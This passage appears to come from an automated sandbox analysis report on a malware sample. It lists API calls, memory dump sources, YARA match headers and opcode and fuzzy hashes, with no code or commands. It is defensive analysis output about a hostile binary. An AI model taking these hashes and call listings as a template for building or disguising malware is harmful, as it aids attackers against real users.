                                                  • Instruction Fuzzy Hash: 90F0F972990215BBDB285A24CC05BFA7778EB41354F050569EC0EA7140EF70FD81CAD0
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,02133F53,?,021416C2,02133F53,?,?,?,?,?,02133F53,?,?), ref: 02141090
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction ID: fb902ec3413cfb9576680649bab29dff4228ea3cf0ecfb42eb1f6fac8a174bec
                                                  • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction Fuzzy Hash: 70F04C323003046FDB245F35DC80B7A7B91EF80358F05453CF90987680D771E8428640
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,021339B1,?,00000004), ref: 02137851
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction ID: b31bf82cfa5ea52cc1eb158afcc6e72ce113c4f2a346263f5bc0aec0aed77be3
                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction Fuzzy Hash: 41F09671A85318BBCB126F609C05F7EBB67DF04711F0041B9FC0566291CB719A119A9A
                                                  APIs
                                                    • Part of subcall function 00444ACC: RtlEnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                  • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  APIs
                                                    • Part of subcall function 02134D33: RtlEnterCriticalSection.NTDLL(?), ref: 02134D42
                                                  • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 0213734D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,02141720,02133F53,?,?,?,?,?,02133F53,?,?,?), ref: 02140F95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02104814,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,0046673C), ref: 020FE8F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BG3i@
                                                  • API String ID: 0-2407888476
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                  • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                  • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                  • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                  • Instruction ID: 3d145a6d080582b6047bb5fd0ccadcf16fd4680d842a3e27463e5a987b8cfe85
                                                  • Opcode Fuzzy Hash: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                  • Instruction Fuzzy Hash: 4DF16C716142548FC318DF1DE89087BB3E5EB8A301B460A2EF1C2D7391DB75EA1ACB56
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                  • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                  • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                  • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                  • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction ID: 1faf3ab6a4c853c886bda351cf8f337822861ee4790bbaee289db5bccf390b9f
                                                  • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                  • Instruction Fuzzy Hash: 5DB183791142998BCB05EF68C4913F63BA1EF6A300F0851B9EC9CCF756E3758506EB64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                  • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction ID: b9c30c8eee15236c683d0f9a0ed1c5277191b4890058b845314ab7d0d91400b4
                                                  • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction Fuzzy Hash: 7E61A9B12C07389ADB3C9A28FA51BBF2399EB41708F04041AF842DB6C0D741E97DC756
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction ID: a770f8f97280ad02b5956e28c4c8c7c6121a0f67d6df6229c1649fee72aa02bf
                                                  • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction Fuzzy Hash: 306167717C06385BDB3C9A68F895BBE2399DB09308F140419F842CBA90D711D97EC659
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                  • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction ID: 6a55e7dcbed9dae2380acebe472aba1bc4163c74424113965d09cfdecc579334
                                                  • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction Fuzzy Hash: 2F613B329483459FC308DF24D581A5FB7E9EFD8714F440D2DF49996290EB31EA098F82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 306c72901d2b26ce0cc09f0b93c105b93af265b8bb3bf4a5d83f020a483628fd
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: D7110B777C00F143D615862DE4B42B7EB85EBC512872D4676F4418B7D8D322A17FD500
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: d6bd96fc0c5ccf4b7f84a987fe9495236d7fc5d98947affefa9051470a771138
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: 9211AC72340200AFDB44DE55DCD5FA677EAFB88320F298065ED08CB352D676E802C760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
